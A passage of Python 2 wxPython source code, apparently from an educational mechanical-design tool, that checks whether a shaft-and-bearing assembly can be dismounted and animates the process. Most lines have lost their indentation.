            # Handle spacers resting on a shoulder
for r in ["Ar","Al"]:
if sens == 0:
pG, pD = 2,3
else:
pG, pD = 3,2
elemG, elemD = self.mtg.palier["G"].arr[r]["D"], self.mtg.palier["D"].arr[r]["G"]
if elemG.estEpaulement() and elemD.estEntretoise():
try:
lst[pD].remove("AGD"+r)
                    except ValueError: pass
elif elemD.estEpaulement() and elemG.estEntretoise():
try:
lst[pG].remove("ADG"+r)
                    except ValueError: pass
else:
try:
lst[pD].remove("AGD"+r)
                    except ValueError: pass
try:
lst[pG].remove("ADG"+r)
                    except ValueError: pass
            # Remove the unneeded bearing pieces
for pos in [1,4]:
if len(lst[pos]) > 3:
p = lst[pos][0][1]
elem = self.mtg.palier[p].rlt
if elem.num is None:
lst[pos].remove("R"+p+"---")
lst[pos].remove("R"+p+"-Ar")
lst[pos].remove("R"+p+"-Al")
elif elem.estSeparableSens(sens, "Al"):
lst[pos].remove("R"+p+"---")
else:
lst[pos].remove("R"+p+"-Ar")
lst[pos].remove("R"+p+"-Al")
grp.lst = lst
            # Define the minimum "levels" ...
            # Count the housing stops
for pos in [0,2,3,5]:
p = lst[pos][0][1]
c = ccote(pos)
elem = self.mtg.palier[p].arr["Al"][c]
# print pos, elem.num
if elem.num is not None:
if not elem.estEntretoise():
grp.min[pos] +=1
            # Add the bearings (if press-fitted in the housing)
for pos in [1,4]:
p = lst[pos][0][1]
elem = self.mtg.palier[p].rlt
if elem.num is not None:
if self.cdcf.bagueTournante == "E" and not self.demonterRltSerres:
grp.min[pos] +=1
return grp
def listeElementsAEnleverRlt(sens, palier):
"Etabli la liste des éléments à enlever pour le démontage des roulements"
lst = []
if (sens == 0 and palier == "G") \
or (sens == 1 and palier == "D"):
if self.mtg.deuxrlt():
return []
if sens == 0:
a = "D"
else:
a = "G"
if self.cdcf.bagueTournante == "I":
r = "Ar"
else:
r = "Al"
if self.mtg.palier["G"].rlt.num is None:
p = "D"
elif self.mtg.palier["D"].rlt.num is None:
p = "G"
else:
p = a
code = "A"+p+a+r
if self.mtg.clefElemPosCode(code)[0].num is not None:
lst.append(code)
#
            # Handle the seals
#
            # Lists of free and fixed elements
# if self.cdcf.bagueTournante == "I":
# lstElemLibres = self.listeElemAlesage[sens]
# else:
# lstElemLibres = self.listeElemArbre[sens]
# self.lstArretsAEnleverEns[sens]
lstElemEnleve = self.lstArretsAEnleverEns[0] + self.lstArretsAEnleverEns[1]
#            print "List of removed elements", lstElemEnleve
code = "J"+p+"-Ar"
if self.mtg.clefElemPosCode(code)[0].num is not None and not code in lstElemEnleve:
lst.append(code)
code = "J"+p+"-Al"
if self.mtg.clefElemPosCode(code)[0].num is not None and not code in lstElemEnleve:
lst.append(code)
# print lst
##            print ">>> to remove", palier, lst
return lst
def estDemontable(sens):
"Teste si le montage est démontable dans le sens <sens>"
def demontagePossible(sens, posAr, posAl):
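                # Recursive sweep (inferred from the code below): compare,
                # slice by slice, the outer size of the shaft-side stack with
                # the inner size of the housing-side stack; on a mismatch try
                # removing or enlarging stops, and return True or the
                # blocking pair [posAr, posAl]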
def dimension(int_ext, pcode, fix = False):
"""Renvoie la dimension de l'élément à la position <pcode>
mesurée depuis l'<int_ext>
parmis les éléments <fix> ou pas"""
## print "Dimension pcode =",pcode
if pcode[3:] == "--":
dicElem = {"Ar" : self.mtg.clefElemPosCode(pcode[0:3]+"Ar")[0],
"Al" : self.mtg.clefElemPosCode(pcode[0:3]+"Al")[0]}
if (int_ext == "E" and dicElem["Al"].num is not None) \
or (int_ext == "I" and dicElem["Ar"].num is None):
rad = "Al"
else:
rad = "Ar"
elem = dicElem[rad]
else:
elem = self.mtg.clefElemPosCode(pcode)[0]
radiale = pcode[3:]
if radiale == "--":
if self.cdcf.bagueTournante == "I":
radiale = "Al"
else:
radiale = "Ar"
##                    print "  --> elem =",elem,elem.pos,elem.taille
dim = elem.dimensions(radiale, int_ext, self.mtg.palier[pcode[1]].taille)
## print " --> dimension =",dim
                    # Choose the appropriate dimension:
                    #-----------------------------------
                    # Case: separated bearings
                    if pcode != "" and pcode[0] == "R" and pcode[3] == "A":
return dim['demonte']
                    # Case: removable stops
                    if elem.num is not None \
and not elem.pasDemontable(not self.mtg.deuxrlt(),elem.pos) \
and fix:
##                        print "Dismounting element",elem.num,pcode,elem.pos
return dim['demonte']
                    # Case: moving stops
if int_ext == "E" and pcode[0] == "A":
return dim['entier']
return dim['entier']
# print lAr[posAr][-1:][0],lAl[posAl][-1:][0],
dimAr = dimension("E", lAr[posAr][-1:][0])
dimAl = dimension("I", lAl[posAl][-1:][0])
# print "\t",dimAr, dimAl,
                if dimAl >= dimAr: # It fits!
# print
if posAl > 0:
return demontagePossible(sens, posAr, posAl-1)
elif posAr > 1:
return demontagePossible(sens, posAr-1, posAr-2)
else:
return True
                else: # It does not fit!
# print "^",
if not bagueIndemontable("Al") and grAl.enlever(posAl, self.mtg, self.lstArretsAEnleverEns[sens]):
# print "//",lAl[posAl][-1:][0]
return demontagePossible(sens, posAr, posAl)
elif not bagueIndemontable("Ar") and grAr.enlever(posAr, self.mtg, self.lstArretsAEnleverEns[sens]):
# print "//",lAr[posAr][-1:][0]
return demontagePossible(sens, posAr, posAl)
elif grAl.agrandir(posAl, grAr):
if posAl in [2,3]:
p = lAr[posAl][-1:][0][1]
c = lAr[posAl][-1:][0][2]
rad = lAr[posAl][-1:][0][3:]
elem = self.mtg.palier[p].arr[rad][c]
if elem.estEntretoise():
# print "^",
grAl.agrandir(posAl-1, grAr)
# print "Al"
return demontagePossible(sens, posAr, posAl)
else:
# print "--"
return [posAr, posAl]
#            print "Testing assembly mountability ...", sens
self.lstArretsAEnleverEns[sens] = []
grAr = listeElemArbre
lAr = listeElemArbre.lst
grAl = listeElemAlesage
lAl = listeElemAlesage.lst
obs = demontagePossible(sens, 5, 4)
if obs is not True:
self.obstacleEnsble[sens] = [lAr[obs[0]][-1:][0],lAl[obs[1]][-1:][0]]
            # Compile and update the lists
            #-----------------------------
#            print ">>> Shaft :\n",listeElemArbre
#            print ">>> Housing :\n",listeElemAlesage
lst = []
for l in listeElemArbre.lst:
lst += l[1:]
s = set(lst)
lst = list(s)
self.listeElemArbre[sens] = lst
lst = []
for l in listeElemAlesage.lst:
lst += l[1:]
s = set(lst)
lst = list(s)
self.listeElemAlesage[sens] = lst
            # Seal handling
            #--------------
            # Handle the seals attached to a housing stop
for p in ["G","D"]:
for r in ["Ar","Al"]:
if self.mtg.palier[p].jnt[r].num is not None:
codeArrAssocie = "A"+p+p+"Al"
if codeArrAssocie in self.lstArretsAEnleverEns[sens]:
self.lstArretsAEnleverEns[sens].append("J"+p+"-"+r)
else:
self.listeElemAlesage[sens].append("J"+p+"-"+r)
            # Handle the seals that are in the way anyhow ... if disassembly is possible!
if self.obstacleEnsble[sens] == [] :
                # Determine which side is in the way ...
# if (sens == 0 and self.cdcf.bagueTournante == "I")\
# or (sens == 1 and self.cdcf.bagueTournante == "E"):
# p = "G"
# else:
# p = "D"
if sens == 0:
p = "G"
else:
p = "D"
#                print "Blocking side:", p, sens, self.cdcf.bagueTournante
                # Remove the seal(s) in the way ...
enleveJnt = False
for r in ["Ar","Al"]:
if self.mtg.palier[p].jnt[r].num is not None:
self.lstArretsAEnleverEns[sens].append("J"+p+"-"+r)
enleveJnt = True
                # Remove the stop sitting on the same cap ...
if enleveJnt:
enleveJnt = False
codeArrAssocie = "A"+p+p+"Al"
if codeArrAssocie in self.listeElemAlesage[sens]:
self.lstArretsAEnleverEns[sens].append(codeArrAssocie)
#            print ">>> Shaft :",self.listeElemArbre[sens]
#            print ">>> Housing :",self.listeElemAlesage[sens]
#            print ">>> Obstacles :", self.obstacleEnsble[sens]
#            print ">>> Elements to remove :", self.lstArretsAEnleverEns[sens]
# print
return
def estDemontableRlt(sens, palier, bagueLibre):
"Teste si le roulement <palier> est démontable dans le sens <sens>"
# print
# print "Test Montabilité Roulements"
# print ">>> Sens",sens
# print ">>> Roulement",palier
# print ">>> Bague libre",bagueLibre
# Détermination des arrets concernés pour le démontage du roulement
lstArrets = []
if (self.cdcf.bagueTournante == "I" and bagueLibre) \
or (self.cdcf.bagueTournante == "E" and not bagueLibre):
radiale = "Ar"
else:
radiale = "Al"
if sens == 0:
if palier == "D":
lstArrets.append("ADD"+radiale)
else:
lstArrets.append("AGD"+radiale)
lstArrets.append("ADG"+radiale)
lstArrets.append("ADD"+radiale)
else:
if palier == "G":
lstArrets.append("AGG"+radiale)
else:
lstArrets.append("ADG"+radiale)
lstArrets.append("AGD"+radiale)
lstArrets.append("AGG"+radiale)
##            print ">>> Stops",lstArrets
tailleRlt = self.mtg.palier[palier].rlt.taille
passPas = []
pos = Montage.PositionDansPivot()
for pa in lstArrets:
ar = self.mtg.elemPos(pos.posCode(pa))
if ar.num is None:
tailleArret = self.mtg.palier[pa[1]].taille
pa = "-"+pa[1]+"-"+pa[3:5]
else:
tailleArret = ar.taille
if tailleRlt <> tailleArret \
and ((radiale == "Ar" and tailleArret == "G") \
or (radiale == "Al" and tailleArret == "P")):
if ar.estEntretoise():
if pa[1] <> palier:
passPas.append("-"+pa[1]+"-"+pa[3:5])
else:
passPas.append(pa)
if tailleRlt == tailleArret and ar.pasDemontable(not self.mtg.deuxrlt()):
passPas.append(pa)
## print ">>> Obstacles",passPas
if len(passPas)>0:
posObs = []
for i in passPas:
posObs.append(pos.posXCode(i))
if palier == "G":
plusProche = passPas[posObs.index(min(posObs))]
else:
plusProche = passPas[posObs.index(max(posObs))]
passPas = [plusProche]
# print ">>> Obstacles",passPas
return passPas
def traiterBaguesIsolees():
obsBagueIsolee = {"G" : [],
"D" : []}
for palier in ["G","D"]:
for sens in [0,1]:
if self.obstacleBagueIsolee[palier][sens] <> []:
obsBagueIsolee[palier].append(self.obstacleBagueIsolee[palier][sens][0])
if len(obsBagueIsolee[palier]) >= 2:
self.obstacleBagueIsolee[palier] = obsBagueIsolee[palier]
else:
del self.obstacleBagueIsolee[palier]
#            print "Isolated-ring obstacles :",self.obstacleBagueIsolee
#
        # Run the analysis ...
#
for sens in [0,1]:
            # Build the lists of free and press-fitted elements
listeElemArbre = listeElementsArbre(sens)
#            print ">>> Shaft elements :\n", listeElemArbre
listeElemAlesage = listeElementsAlesage(listeElemArbre.lst, sens)
#            print ">>> Housing elements :\n", listeElemAlesage
# self.listeElemArbre[sens] = listeElementsArbre(sens)
# self.listeElemAlesage[sens] = listeElementsAlesage(self.listeElemArbre[sens],sens)
            # Test whether the assembly can be dismounted
estDemontable(sens)
            # Build the list of elements to remove for disassembly
# self.lstArretsAEnleverEns[sens] = listeElementsAEnleverEns(sens)
for sens in [0,1]:
            # Test whether the bearings can be dismounted
for p in ["G","D"]:
self.obstacleRoults[p][sens] = estDemontableRlt(sens,p,True)
            # Test whether the isolated rings can be dismounted
for p in ["G","D"]:
self.obstacleBagueIsolee[p][sens] = estDemontableRlt(sens,p,False)
            # Build the list of elements to remove for dismounting the bearings
for p in ["G","D"]:
self.lstArretsAEnleverRlt[p][sens] = listeElementsAEnleverRlt(sens,p)
        # Invert the disassembly direction if the rotating ring is the outer one
if self.cdcf.bagueTournante == "E":
#            print "Reversing mounting direction ..."
self.listeElemArbre.reverse()
self.listeElemAlesage.reverse()
self.lstArretsAEnleverEns.reverse()
self.obstacleEnsble.reverse()
        # Handle the isolated rings
traiterBaguesIsolees()
##        print "Isolated rings :",self.obstacleBagueIsolee
#        # Prepare the items for the animations
# for sens in [0,1]:
# self.preparerMontageDemontageEns(sens)
# for p in ["G","D"]:
# self.preparerMontageDemontageRlt(sens,p)
##        print "Bearing obstacles 1 :",self.obstacleRoults
        # Overall mountability:
#----------------------
montables = {}
        # bearings
for p in self.obstacleRoults:
obs = self.obstacleRoults[p]
montables[p] = (obs[0] == []) or (obs[1] == [])
        # isolated rings
for p in self.obstacleBagueIsolee:
obs = self.obstacleBagueIsolee[p]
montables["I"+p] = obs == []
        # case of bearings acting as obstacles
for p in ["G","D"]:
if p == "G":
o = "D"
s = 0
else:
o = "G"
s = 1
obs = self.obstacleRoults[p]
ropp = self.obstacleRoults[o]
if ropp[0] <> [] and ropp[1] <> [] and obs[s] == []:
obs[s].append("R"+o+"---")
##                print "Bearing obstacle fix",p,"direction",s," : ",obs[s]
        # assembly
for s in [0,1]:
##            print "MOUNTABILITY"
## print self.obstacleEnsble[s]
montables[s] = self.obstacleEnsble[s] == []
# montables[s] = True
# for p in ["G","D"]:
# montables[s] = montables[s] and (self.obstacleEnsble[s][p] == ())
## print montables[s]
montables["E"] = montables[0] or montables[1]
del montables[0]
del montables[1]
# print montables
        montable = all(montables.values())
if montable:
self.resultatMontabilite = Const.MessageAnalyse('MontPoss')
else:
self.resultatMontabilite = Const.MessageAnalyse('MontImposs')
self.listeItemLibres = [self.GetListeItemLibres(zoneMtg, 0), self.GetListeItemLibres(zoneMtg, 1)]
self.ListeItemRoult = {"G" : [self.GetListeItemRoult(zoneMtg, 0, "G"),self.GetListeItemRoult(zoneMtg, 1, "G")],
"D" : [self.GetListeItemRoult(zoneMtg, 0, "D"),self.GetListeItemRoult(zoneMtg, 1, "D")]}
##        print "Bearing obstacles 2 :",self.obstacleRoults
##########################################################################
def afficher_cacherArretsAEnleverEns(self, zoneMtg, sens, afficher = True, instant = False):
self.afficher_cacherArretsAEnlever(zoneMtg, sens, "E", afficher, instant)
##########################################################################
def afficher_cacherArretsAEnleverRlt(self, zoneMtg, sens, afficher = True, instant = False):
self.afficher_cacherArretsAEnlever(zoneMtg, sens, False, afficher, instant)
##########################################################################
def afficher_cacherArretsAEnlever(self, zoneMtg, sens, objet, afficher, instant):
""" Affiche ou cache les éléments à enlever pour le montage/démontage
sens du démontage : <sens>
objet à enlever : <objet> = "E" ou "G" ou "D"
instantanément : <instant>
"""
# print " Afficher/Cacher éléments à enlever :",tag
# sens = eval(tag[8])
ensemble = objet == "E"
if self.cdcf.bagueTournante == "I" and ensemble \
or self.cdcf.bagueTournante == "E" and not ensemble:
radiale = "Al"
else:
radiale = "Ar"
# Cas des "Ensembles"
if objet == "E":
lst = self.lstArretsAEnleverEns[sens]
        # Bearing case
else:
## if (tag[7] == "G" and sens == 1) \
## or (tag[7] == "D" and sens == 0):
lst = self.lstArretsAEnleverRlt[objet][sens]
## else:
## lst = []
#        print " ... elements to remove :",sens, lst
if len(lst) == 0:
return
        # Prepare the fade parameters
if instant:
rng = range(0,101, 100)
else:
            rng = range(0,101,4) # in %
if afficher:
n = 'imag'
o = 'vide'
else:
n = 'vide'
o = 'imag'
rng.reverse()
#        # Prepare the non-retained elements ########################
#        for i in zoneMtg.lstItemMtg: # walk every displayed item
#            # include all shaft elements
# if TAG_ARBRE in i.tag:
# lstItemAnim.append(i)
# continue
#            # include the listed elements (excluding housing elements)
# else:
# print i.tag,
# for t in self.listeElementsNonArretes[sens]:
# if t in i.tag and not TAG_ALESAGE in i.tag:
# lstItemAnim.append(i)
# continue
lstItemEff = []
for itemTag in lst:
e = self.mtg.clefElemPosCode(itemTag)[0]
# lstItemEff.append(e.item['imag'])
            for i in zoneMtg.lstItemMtg: # walk every displayed item
for t in e.item['imag'].tag:
if t in i.tag:
                        lstItemEff.append(i) # add every item sharing the same tag
#        print " ... erased items :",lstItemEff
lstItemEch = []
for i in lstItemEff:
if hasattr(i, "vide"):
lstItemEch.append(i)
else:
lstItemEch.append(None)
#        print " ... swapped items :",lstItemEch
        # The fade ...
for niv in rng[1:]:
for i in range(len(lstItemEff)):
lstItemEff[i].fondu(lstItemEch[i], niv)
if not instant:
zoneMtg.Redessiner()
time.sleep(0.020)
return
############################################################
def GetListeItemLibres(self, zoneMtg, sens):
""" Préparation du Montage/Démontage de l'ensemble "Alésage"
renvoie la liste des items qui vont se déplacer ...
"""
## print
#        print "Preparing mounting/dismounting of the assembly"
#        print ">>> direction",sens
# tag = "AnimEnsb" + str(sens)
## print " ... tag =",tag
def lstElemAEnlever(rad):
lst = []
for c in self.lstArretsAEnleverEns[sens]:
if rad == "Ar":
if c[0] != "J" and c[-2:] == rad:
lst.append(c)
else:
if c[0] == "J" or c[-2:] == rad:
lst.append(c)
return lst
#
        # Select the free elements
#
if self.cdcf.bagueTournante == "I":
rad = TAG_ALESAGE
lstElemLibres = self.listeElemAlesage[sens]
lstElemLibres.extend(lstElemAEnlever("Al"))
else:
rad = TAG_ARBRE
lstElemLibres = self.listeElemArbre[sens]
lstElemLibres.extend(lstElemAEnlever("Ar"))
#        print ">>> Free elements list, direction", sens, ":",lstElemLibres
#
        # Select the free items
#
lstItemAnim = []
for i in zoneMtg.lstItemMtg:
#
            # Include the shaft (or housing) elements
#
if rad in i.tag:
lstItemAnim.append(i)
continue
#
            # Include the elements listed in 'lstElemLibres'
#
else:
# print i.tag,
for t in lstElemLibres:
# print t
if t in i.tag:
lstItemAnim.append(i)
# print
continue
# print "1",lstItemAnim
#
        # Add the extra stops to remove that can be dismounted/mounted
#
# for itemTag in self.lstArretsAEnleverEns[sens]:
# e = self.mtg.clefElemPosCode(itemTag[0:])[0]
# if e.item.has_key('supp'):
# lstItemAnim.append(e.item['supp'])
# print "2",lstItemAnim
return lstItemAnim
############################################################
def GetListeItemRoult(self, zoneMtg, sens, palier):
"""Préparation du Montage/Démontage des roulements"""
# print
#        print "Preparing mounting/dismounting of the bearing"
#        print ">>> direction",sens
#        print ">>> bearing support",palier
# tag = "AnimRlt" + palier + str(sens)
lstItemAnim = []
## print " ... tag =",tag
if self.cdcf.bagueTournante == "I":
radiale = "Ar"
radopp = "Al"
else:
radiale = "Al"
radopp = "Ar"
        # Assembly already dismounted
if "AnimEnsb0" in self.elemDemonte:
te = "AnimEnsb0"
elif "AnimEnsb1" in self.elemDemonte:
te = "AnimEnsb1"
else:
te = None
        # Lists of free and fixed elements
if self.cdcf.bagueTournante == "I":
lstElemLibres = self.listeElemAlesage[sens]
lstElemFixes = self.listeElemArbre[sens]
else:
lstElemLibres = self.listeElemArbre[sens]
lstElemFixes = self.listeElemAlesage[sens]
        # List of elements to dismount ############################
lst = []
        # The bearing ...
for tr in ["R"+palier+"-Ar",
"R"+palier+"-Al",
"R"+palier+"---"]:
if tr in lstElemFixes:
lst.append(tr)
        # Other elements to dismount ...
if (palier == "G" and sens == 0) \
or (palier == "D" and sens == 1):
for tr in ["AGD"+radiale,
"ADG"+radiale,
"ADG"+radopp,
"AGD"+radopp]:
if tr in lstElemFixes:
lst.append(tr)
#        print " ... elements to dismount ? =",lst
# for tr in ["J"+palier+"-Ar",
# "J"+palier+"-Al"]:
# if tr in lstElemFixes:
# lst.append(tr)
        # Finalize the list of elements to dismount
lst2 = []
for c in lst:
## print "tag",c," : ",frameMtg.gettags(c)
pasDejaDemonte = not c in lstElemLibres
##            print "not already dismounted =",pasDejaDemonte,frameMtg.gettags(c)
pasAEnlever = not (c in self.lstArretsAEnleverRlt[palier][sens])
##            print "not to be removed =",pasAEnlever
if (pasDejaDemonte or c == "R"+palier+"---" ) and (pasAEnlever or c[0] == "R"): #and frameMtg.gettags(c) <> () \
lst2.append(c)
        # Apply the tags ... excluding the shoulders
for i in zoneMtg.lstItemMtg:
for t in lst2:
if t in i.tag and not TAG_ARBRE in i.tag and not TAG_ALESAGE in i.tag:
lstItemAnim.append(i)
#        # Remove the shoulders
# frameMtg.dtag(TAG_ARBRE,tag)
# frameMtg.dtag(TAG_ALESAGE,tag)
## if self.cdcf.bagueTournante <> u"Extérieure":
## for t in self.lstArretsAEnleverRlt[sens]:
## frameMtg.addtag_withtag(tag,t)
##        print " ... elements to dismount =",lst2
#        print "Bearing",palier,"direction",sens
#        print " ... elements to dismount =",lst2
#        print " ... items to dismount =",lstItemAnim
return lstItemAnim
############################################################
def animerMontageDemontage(self, zoneMtg, tag, remonter, instant = False):
""" Animation du Montage/Démontage
"""
def animer():
            # Duration (seconds)
duree = globdef.DUREE_ANIMATION_MONTAGE
            # Number of frames (at FRAME_RATE img/s)
nbPos = duree * globdef.FRAME_RATE
            # Parameter of the motion law x(t) = a*t**2
a = 1.0*sensdep*dist/nbPos**2
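            # with n = 0 the parabola accelerates from 0 to 'dist';
            # with n = 1 it runs back from 'dist' to 0 (remounting)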
oldx = 0
for c in range(nbPos):
tm = time.clock()
x = int(round(a*(c-n*nbPos)**2))
if x <> oldx:
for i in lstItemAnim:
i.pos = (i.x + x, i.pos[1])
oldx = x
zoneMtg.Redessiner()
dt = 1.0/globdef.FRAME_RATE - time.clock() + tm
if dt > 0:
time.sleep(dt)
#        if remonter: t = "Dismounting"
#        else       : t = "Mounting"
# print
# print " Animation ",tag
wx.BeginBusyCursor()
# def GroupeBmp(lstItem):
#            # Combine the images
# bmp = wx.EmptyBitmap(zoneMtg.maxWidth, zoneMtg.maxHeight)
# memdc = wx.MemoryDC(bmp)
# memdc.SetBackground(wx.Brush(wx.Colour(255,255,254))) #wx.TRANSPARENT_BRUSH)
# memdc.Clear()
# for i in lstItemAnim:
# memdc.DrawBitmap(i.bmp, i.pos[0], i.pos[1], True)
# zoneMtg.hachurer(memdc, self.listeElementsNonArretes[sens])
# memdc.SelectObject(wx.NullBitmap)
# img = wx.ImageFromBitmap(bmp)
# img.SetMaskColour(255,255,254)
# img.SetMask(True)
# bmp = wx.BitmapFromImage(img)
# return bmp
#
        # Set the travel distance (in pixels)
#
if tag[4] == "E":
dist = DISTANCE_DEMONTAGE_ENSEMBLE
else:
if tag[7] == "G" and tag[8] == "0" \
or tag[7] == "D" and tag[8] == "1":
dist = DISTANCE_DEMONTAGE_RLT_LONG
else:
dist = DISTANCE_DEMONTAGE_RLT_COURT
#
        # Build the list of items to animate
        #
        sens = int(tag[8])
if tag[4] == "E":
lstItemAnim = self.listeItemLibres[sens]
else:
lstItemAnim = self.ListeItemRoult[tag[7]][sens]
#        print " ... elements to dismount =",self.listeElemAlesage[sens]
#        print " ... items to dismount =",lstItemAnim
#
        # Start the animation
        #====================
#
        # sign of the displacement direction ########################
if not remonter:
sgn = 1
else:
sgn = -1
        # displacement direction (disassembly) ######################
        # (  1 = to the right
        #   -1 = to the left )
        sensdep = 1 - int(tag[8]) * 2
if remonter:
n = 1
else:
n = 0
        # Take off the stops to remove
if tag[4] == "E":
objet = "E"
else:
objet = tag[7]
if not remonter:
self.afficher_cacherArretsAEnlever(zoneMtg, sens, objet, remonter, instant)
        # Save the x position
if not remonter:
for i in lstItemAnim:
i.x = i.pos[0]
        # Motion
if instant:
# print dist*sensdep*sgn
for i in lstItemAnim:
i.pos = (i.pos[0] + dist*sensdep*sgn, i.pos[1])
# zoneMtg.Redessiner()
else:
animer()
        # Show the removed stops again
if remonter:
self.afficher_cacherArretsAEnlever(zoneMtg, sens, objet, remonter, instant)
wx.EndBusyCursor()
#############################################################################
def initTraceResultats(self, zoneMtg):
self.mobileTrace = None
self.chaineTracee = {0 : None,
1 : None}
self.obstacleTrace = None
# for t in self.chaineTracee.values():
# t = None
# self.mobileTrace = None
# for t in self.obstacleTrace.values():
# t = None
def reinitialiserAffichage(self, zoneMtg):
#        print "Resetting the analysis display"
if self.mobileTrace is not None:
self.tracerSurBrillanceMobiles(zoneMtg, self.mobileTrace, False)
self.initTraceResultats(zoneMtg)
# print self.chaineTracee.values()
zoneMtg.Redessiner(self)
def SetTracerChaine(self, sens, state):
self.chaineTracee[sens] = state
#############################################################################
def tracerResultats(self, dc, zoneMtg):
#        print "Drawing analysis results",self.chaineTracee.items()
for s,t in self.chaineTracee.items():
if t is not None:
#                print "  Drawing chain",s
self.tracerChaineAct(dc, zoneMtg, s)
if self.mobileTrace is not None:
self.tracerFlechesObstacleEnsemble(dc, zoneMtg, self.mobileTrace)
# for obs in self.obstacleTrace.values():
self.tracerObstacle(dc, zoneMtg, self.obstacleTrace)
##############################################################################################
def tracerSurbrillanceArrets(self, zoneMtg, sens, action = True, montrer = True):
""" Met les arrets ne résistant pas en surbrillance
"""
for p in self.lstElemResistePas[sens]:
elem = self.mtg.clefElemPosCode(p)[0]
if action:
elem.item['imag'].couleur("rouge")
try:
elem.item['imagAr'].couleur("rouge")
                except KeyError:
pass
zoneMtg.SurBrillanceActive = False
else:
elem.item['imag'].normale()
zoneMtg.SurBrillanceActive = True
try:
elem.item['imagAr'].normale()
            except KeyError:
pass
if montrer :
zoneMtg.Redessiner(self)
###############################################################################
def tracerSurBrillanceMobiles(self, zoneMtg, sens, active = True):
""" Met en surbrillance Bleu et Noir
les ensembles entrant en collision (indémontable)
"""
# print "Surbrillance collision"
# sens = eval(tag[8])
def mettreEnSurbrillance():
for i in self.lstItemAles:
i.couleur("bleu")
for i in self.lstItemArbre:
i.couleur("noir")
def oterSurbrillance():
for i in zoneMtg.lstItemMtg:
i.normale()
#        print "Moving-part highlight: direction",sens
#        print ">>> Press-fitted elements :",self.listeElemArbre[sens]
#        print ">>> Free elements :",self.listeElemAlesage[sens]
self.lstItemArbre = []
self.lstItemAles = []
if self.elemDemonte <> []:
return
listeSerres = self.listeElemArbre[sens]
listeLibres = self.listeElemAlesage[sens]
        # Elements attached to the housing
        #---------------------------------
for pcode in self.listeElemAlesage[sens]:
elem,lstclef = self.mtg.clefElemPosCode(pcode)
for clef in lstclef:
self.lstItemAles.append(elem.item[clef])
        # Elements attached to the shaft
        #-------------------------------
for pcode in self.listeElemArbre[sens]:
elem,lstclef = self.mtg.clefElemPosCode(pcode)
for clef in lstclef:
self.lstItemArbre.append(elem.item[clef])
        # Shaft or housing fragments
        #---------------------------
for i in zoneMtg.lstItemMtg:
            # include the shaft elements
if TAG_ARBRE in i.tag:
self.lstItemArbre.append(i)
elif TAG_ALESAGE in i.tag:
self.lstItemAles.append(i)
        # Elements to remove
        #-------------------
for pcode in self.lstArretsAEnleverEns[sens]:
elem,lstclef = self.mtg.clefElemPosCode(pcode)
for clef in lstclef:
if pcode[3:] == "Ar":
self.lstItemArbre.append(elem.item[clef])
elif pcode[3:] == "Al":
self.lstItemAles.append(elem.item[clef])
        # Remove duplicates
        #------------------
# def OterDoublons(liste):
# i = 0
# while i < len(liste):
# if liste[i] in liste[i+1:]:
# liste.pop(i)
# i += 1
# OterDoublons(self.lstItemArbre)
# OterDoublons(self.lstItemAles)
self.lstItemArbre = list(set(self.lstItemArbre))
self.lstItemAles = list(set(self.lstItemAles))
        # Hide or show the elements to dismount (instantly!)
        #---------------------------------------------------
self.afficher_cacherArretsAEnleverEns(zoneMtg, sens, not active, instant = True)
if active:
mettreEnSurbrillance()
else:
oterSurbrillance()
if active:
self.mobileTrace = sens
else:
self.mobileTrace = None
zoneMtg.Redessiner(self)
#############################################################################
def tracerFlechesObstacleEnsemble(self, dc, zoneMtg, sens):
""" Trace des fleches illustrant le sens de collision des ensembles mobiles (indémontable)
"""
def Fleche(long, sens, texte):
""" Fleche avec texte dedans ...
"""
            # thickness (pixels)
e = 41
            # shadow offset
o = 4
            # Arrow pen
pen = wx.Pen(wx.Colour(159,0,0), e)
# pen = wx.Pen("red", e)
pen.SetCap(wx.CAP_BUTT)
            # Arrow end points
x1,y1,x2,y2 = 0, e/2, long, e/2
bmp = wx.EmptyBitmap(long+o, e+o)
dc = DCPlus(bmp)
dc.SetBackground(wx.TRANSPARENT_BRUSH)
dc.Clear()
dc.SetBrush(wx.Brush(wx.BLACK))
dc.SetTextForeground(wx.NamedColour('LIGHT GREY'))
dc.SetPen(pen)
dc.DrawLineArrow(x1,y1,x2,y2,
style = 1+(sens+1)/2, tanF = 1)
dc.SetFont(wx.Font(14, wx.DEFAULT, wx.ITALIC, wx.BOLD, False))
lt, ht = dc.GetTextExtent(texte)
if sens == -1:
x1 = x2-lt
dc.DrawText(texte, x1, y1 - ht/2)
dc.SelectObject(wx.NullBitmap)
bmp.SetMask(wx.Mask(bmp))
bmp = Images.ombrer(bmp)
return bmp
if self.cdcf.bagueTournante == "I": s = 1
else: s = -1
dy = 210
for i in [-1, 0, 1]:
sg = (i*i*2-1)*s*(sens * 2 - 1)
bmp = Fleche(160, -sg, " Impossible !! ")
y = zoneMtg.milieuY + i * dy - bmp.GetHeight()/2
x = zoneMtg.milieuX - sg * 150
dc.DrawBitmap(bmp, x, y, True)
#############################################################################
def tracerObstacle(self, dc, zoneMtg, obsTrace):
""" Met en évidence un obstacle au démontage
par une double flèche les éméments en collision
"""
if obsTrace is None:
return
#        print u"drawing the obstacles :", obsTrace
obs, rad = obsTrace[0], obsTrace[1]
lien = []
#        print "Drawing arrow between :",obs, rad
# print obs[0].posX(), obs[1].posX()
        # Put the list in "D" "G" order
if obs[0].posX() > obs[1].posX():
obs.reverse()
lstPosX = [[obs[0],"D"],
[obs[1],"G"]]
# print lstPosX, obs[0].posX(), obs[1].posX()
        # Compute the coordinates
for posX in lstPosX:
x , y = zoneMtg.coordsBordElem(self.mtg, posX[0], posX[1], rad)
# print x
lien.append((x,zoneMtg.milieuY + y))
        # Put everything at the same height ...
def fleche(sens, pt):
            # Arrow tip
s = sens*2-1
lf, ef = 10, 5
x,y = pt[0],pt[1]
return [(x,y),(x + s*lf, y+lf), (x + s*lf, y-lf)]
def tracerFleche():
dc.SetPen(wx.Pen(coul, 5))
dc.DrawLines(lien)
dc.SetPen(wx.Pen(coul, 1))
dc.DrawPolygon(fleche(1, lien[len(lien)-1]), fillStyle = wx.WINDING_RULE)
dc.DrawPolygon(fleche(0, lien[0]), fillStyle = wx.WINDING_RULE)
        # Draw the arrow
if len(lien)>1:
# print lien
# lien[0][1] = (lien[0][1] + lien[1][1]) / 2
# lien[1][1] = lien[0][1]
# if lien[0][0] == lien[1][0]:
# lien[0][0] -= 1
## if cote == "D":
## a = lien[2]
## lien[2] = lien[0]
## lien[0] = a
coul = "red"
tracerFleche()
lien[0] = (lien[0][0], 2 * zoneMtg.milieuY - lien[0][1])
